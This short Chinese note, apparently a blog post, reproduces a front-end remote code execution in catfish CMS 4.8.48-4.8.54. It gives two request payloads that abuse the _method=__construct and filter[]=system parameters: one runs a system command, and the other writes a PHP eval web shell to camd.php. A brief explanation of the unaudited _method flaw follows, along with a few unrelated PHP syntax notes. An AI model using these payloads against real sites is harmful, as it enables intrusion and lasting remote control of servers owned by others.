[开发测试]catfish V4.8.48-4.8.54 前台getshell复现过程

s=dir&filter[]=system&_method=__construct&method=*

s=echo “<?php @eval($_POST['attack']);?>” >camd.php&filter[]=system&_method=__construct&method=*

原理就是网站代码在设计时有两个函数可以相互传值，可以间接的把 __construct()：构造函数/方法直接传进去执行，你看payload为什么会直接执行黑进去，就是因为在_method这个魔术常量没有审计用户会调用值进去。

看教程时几个关键点的知识点：
$user->friends_count
取对象的friends_count属性。

$t->homeTimeline($p)
调用对象的homeTimeline方法，方法中传入一个参数$p